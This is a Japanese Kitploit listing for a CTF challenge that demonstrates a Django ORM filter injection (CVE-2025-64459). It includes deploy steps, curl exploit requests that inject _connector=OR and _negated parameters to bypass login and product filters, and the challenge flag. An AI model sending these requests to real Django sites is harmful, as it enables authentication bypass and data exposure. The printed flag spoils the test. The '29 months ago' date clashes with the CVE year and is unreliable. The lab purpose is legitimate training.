Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-64459 — CTFチャレンジで、Django ORMフィルターインジェクション(CVE-2025-64459)を実演し、認証バイパスと製品フィルターバイパスのエクスプロイトを含み、デプロイとフラグ取得を扱います。 | Kitploit
ツール/GitHubGitHub/z3yr0xx/cve-2025-64459
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティCTF学習と教育ラボと実践
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

CTFチャレンジで、Django ORMフィルターインジェクション(CVE-2025-64459)を実演し、認証バイパスと製品フィルターバイパスのエクスプロイトを含み、デプロイとフラグ取得を扱います。

リポジトリを見る
29ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CTF チャレンジ: Django ORM インジェクション (CVE-2025-64459)

カテゴリ: Webセキュリティ
難易度: 中級
脆弱性: CVE-2025-64459 - Django ORM フィルターインジェクション

📝 説明

私たちは管理パネル付きの安全なグッズショップを構築しました。認証をバイパスして、非公開の管理者メモを見つけられますか?

URL: http://YOUR_SERVER:6008

🚀 デプロイ

root@kitploit:~
cd web_django_cve
docker-compose up --build -d

🎯 エクスプロイト (CVE-2025-64459)

認証バイパス (/login/)

root@kitploit:~
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

プロダクトフィルターバイパス (/)

root@kitploit:~
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"

# Direct access
curl "http://HOST:8054/?is_public=False"

🏁 フラグ

lol-you-here_then-you_exploited_me

ツールをダウンロード